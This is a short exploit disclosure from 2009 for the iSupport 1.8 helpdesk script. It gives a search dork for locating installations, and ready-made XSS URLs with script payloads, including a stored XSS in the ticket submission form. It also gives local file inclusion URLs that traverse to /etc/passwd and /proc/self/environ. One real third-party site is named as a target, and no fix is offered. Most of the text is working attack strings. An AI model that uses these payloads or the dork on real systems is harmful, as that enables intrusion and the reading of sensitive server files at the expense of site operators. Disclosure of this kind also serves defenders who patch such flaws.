--------------------------------------------- ++ iSupport <= 1.8 ++ XSS/Local File Include Exploit --------------------------------------------- Discovered by : Stink' & Essandre DATE : 16/12/09 ////////////////////////////////////////////////////////////////////// Website : http://www.idevspot.com/ DEMO : http://www.idevspot.com/demo/iSupport/ DOWNLOAD : http://www.idevspot.com/iSupport.php => $ ////////////////////////////////////////////////////////////////////// [+] Vulnerability and Exploitation Dork : "Powered by [ iSupport 1.8 ]" --[XSS]-- http://[TARGET]/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=[XSS] http://[TARGET]/[PATH]/function.php?which=[XSS] Exemple : http://server/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E http://serverhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E --[XSS]-- in the member zone http://jvdominator.com/helpdesk/index.php?include_file=ticket_submit.php The flaw is in the form. In "Subject, Comments, etc. ..." After clicking "Submit Ticket" and you have your alert xss:) --[LFI]-- http://[TARGET]/[PATH]/index.php?include_file=[LFI] Exemple : http://server/helpdesk/index.php?include_file=../../../../../proc/self/environ http://server/helpdesk/index.php?include_file=../../../../../etc/passwd [+] Solution : N/A The flaw is secure on some site, but we do not know if the publisher or persons using the scripts that are secure.